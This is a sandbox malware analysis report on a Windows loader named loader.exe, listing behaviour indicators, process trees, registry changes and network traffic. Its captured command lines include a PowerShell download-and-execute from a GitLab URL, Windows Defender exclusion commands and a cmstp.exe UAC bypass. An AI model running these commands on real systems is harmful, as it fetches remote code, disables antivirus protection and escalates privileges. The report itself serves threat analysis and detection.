File name: loader.exe

Full analysis: https://app.any.run/tasks/8b876f7a-c70f-45b4-ad2b-79c28228ae74
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 04, 2026, 03:06:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
arch-exec
arch-doc
smb
scan
smbscan
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5: 6F5F0083873606EF3656D9A0A2A62A16
SHA1: 80742CFD8FDE8632694E4CC5B283F17188A57522
SHA256: E6C0E85BD1B6E03EA4B1823F73188BD95BF986201CF45A932F26D486CAACDA25
SSDEEP: 768:1qeJWZdFE2ECEL8JRLgl2jVPVEWs8nvynqflSRnVXbOfC1TkIc/e1:kg2ECELcL6UVPVEWs8nvy2AbO3IcC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5768)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 6672)
    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
    • Changes Windows Defender settings

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Changes powershell execution policy (Bypass)

      • pythonw.exe (PID: 7260)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • SMBSCAN has been detected (SURICATA)

      • elonmusk.exe (PID: 7116)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Application launched itself

      • loader.exe (PID: 8128)
      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6672)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • elonmusk.exe (PID: 4112)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 7624)
    • Starts POWERSHELL.EXE for commands execution

      • loader.exe (PID: 3380)
      • powershell.exe (PID: 7408)
      • cmd.exe (PID: 2220)
      • pythonw.exe (PID: 7260)
      • powershell.exe (PID: 6672)
      • cmd.exe (PID: 7560)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1312)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 1312)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 7724)
      • elonmusk.exe (PID: 4112)
      • ap.exe (PID: 5384)
    • Process drops python dynamic module

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)
    • Loads Python modules

      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • elonmusk.exe (PID: 7116)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • pythonw.exe (PID: 7900)
    • Used cmstp for execute code hidden within an inf file

      • pythonw.exe (PID: 7900)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7324)
      • cscript.exe (PID: 1296)
    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 5768)
      • cmd.exe (PID: 4104)
    • Executing commands from ".cmd" file

      • pythonw.exe (PID: 7260)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 4104)
      • cmd.exe (PID: 7560)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6672)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 19912)
      • powershell.exe (PID: 20264)
      • powershell.exe (PID: 20136)
    • Base64-obfuscated command line is found

      • pythonw.exe (PID: 7260)
    • BASE64 encoded PowerShell command has been detected

      • pythonw.exe (PID: 7260)
    • Executing commands from a ".bat" file

      • cscript.exe (PID: 1296)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7724)
    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 7724)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7724)
    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 880)
      • OneDrive.exe (PID: 19952)
    • Starts a Microsoft application from unusual location

      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Potential Corporate Privacy Violation

      • elonmusk.exe (PID: 7116)
    • The process executes via Task Scheduler

      • OneDrive.exe (PID: 19952)
  • INFO

    • Checks supported languages

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)
      • OneDrive.exe (PID: 19952)
    • Create files in a temporary directory

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)
    • Reads the computer name

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • hxxo.exe (PID: 3140)
      • ap.exe (PID: 5384)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)
      • OneDrive.exe (PID: 19952)
    • Reads the machine GUID from the registry

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Reads security settings of Internet Explorer

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • cscript.exe (PID: 1296)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)
    • Reads Environment values

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
    • Disables trace logs

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • cmstp.exe (PID: 2532)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 7624)
    • Using PowerShell for GZIP File Operations

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 1312)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 1140)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 19912)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 20136)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 7724)
    • The sample compiled with english language support

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)
    • The executable file from the user directory is run by the Powershell process

      • pythonw.exe (PID: 7900)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • elonmusk.exe (PID: 4112)
    • Python executable

      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 2532)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1140)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 19912)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 7624)
    • Attempt to connect to SMB server

      • elonmusk.exe (PID: 7116)
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (55.8)
.exe | Win64 Executable (generic) (21)
.scr | Windows screen saver (9.9)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2026:04:04 03:05:25+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 31744
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x9a3e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 0.0.0.0
InternalName: loader.exe
LegalCopyright:
OriginalFileName: loader.exe
ProductVersion: 0.0.0.0
AssemblyVersion: 0.0.0.0
No data.
Total processes: 187
Monitored processes: 52
Malicious processes: 18
Suspicious processes: 1

Behavior graph

Graph nodes, in order (the #SMBSCAN tag marks the process that triggered the SMB scan detection):
start, loader.exe, loader.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, pythonw.exe, cmstp.exe, CMSTPLUA, wscript.exe, pythonw.exe, taskkill.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, cmd.exe, conhost.exe, taskkill.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, cscript.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, powershell.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, ap.exe, hxxo.exe, powershell.exe, conhost.exe, elonmusk.exe, elonmusk.exe (#SMBSCAN), powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, onedrive.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process
PID: 664
CMD: powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 880
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\OneDrive.exe'
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: ap.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1108
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1140
CMD: powershell.exe -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1296
CMD: "C:\Windows\System32\cscript.exe" //nologo "C:\Users\admin\AppData\Local\Temp\idk.vbs" "C:\Users\admin\AppData\Local\Temp\skibidi.bat"
Path: C:\Windows\System32\cscript.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1312
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c iex (iwr https://gitlab.com/haingng16/sigmatoilet/-/raw/main/uac -UseBasicParsing)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
PID: 1404
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2220
CMD: cmd.exe /c C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmd
Path: C:\Windows\System32\cmd.exe
Parent process: pythonw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2532
CMD: cmstp.exe /au "C:\Users\admin\AppData\Local\Temp\lkdjbpuvbs.inf"
Path: C:\Windows\System32\cmstp.exe
Parent process: pythonw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.2.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmstp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 2684
CMD: powershell -W Hidden -C "Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'python.exe' -EA 0; Add-MpPreference -ExclusionProcess 'pythonw.exe' -EA 0; "
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events: 103 968
Read events: 103 956
Write events: 12
Delete events: 0

Modification events

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (2532) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: FileDirectory
Value: %windir%\tracing

(PID) Process: (5768) dllhost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation: write
Name: @%SystemRoot%\system32\cmlua.dll,-100
Value: Connection Manager

(PID) Process: (5768) dllhost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation: write
Name: ProfileInstallPath
Value: C:\ProgramData\Microsoft\Network\Connections\Cm

(PID) Process: (5768) dllhost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation: write
Name: SM_AccessoriesName
Value: Accessories
Executable files: 106
Suspicious files: 7
Text files: 79
Unknown types: 0

Dropped files

Columns: PID, Process, Filename, Type

PID: 8128, Process: loader.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vsbsfrgn.r5g.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3380, Process: loader.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b11n3ukq.rdq.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1312, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h5c44ebj.qyb.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1312, Process: powershell.exe, Filename: C:\Users\admin\AppData\Roaming\Google\python\pythonw.exe, Type: executable
MD5: CE34CDA31EAE4589F5B158253DD55F54
SHA256: 58B39B6D8DC9F51A94F1A3143E49B7498FB804A101F2B33BAA14BD72D45298F8

PID: 1312, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hh21oyto.aj0.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 8128, Process: loader.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_beeubtwi.xk1.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7408, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50oe4adw.c0r.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3380, Process: loader.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1zkmmyy4.2vs.ps1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7408, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ls4bnp0w.tr5.psm1, Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7408, Process: powershell.exe, Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, Type: binary
MD5: CDB6E241B2673AA24A8E0EF2A6D7FF3A
SHA256: 03E5FF695D1A469F4635FBC33D7C3E4ED5CF6B54C30E4E18E01C101F694F5DF4
HTTP(S) requests: 34
TCP/UDP connections: 20 413
DNS requests: 26
Threats: 40

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop
US
whitelisted
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
3140
SIHClient.exe
GET
304
74.178.76.128:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
3140
SIHClient.exe
GET
200
74.178.240.51:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
3140
SIHClient.exe
GET
200
74.178.76.128:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
3140
SIHClient.exe
GET
304
74.178.76.128:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
959 b
whitelisted
5392
svchost.exe
GET
200
20.73.194.208:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaaSAssessment?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=10.0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=WaaSAssessment&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&ServicingBranch=CB&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&HonorWUfBDeferrals=1&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
text
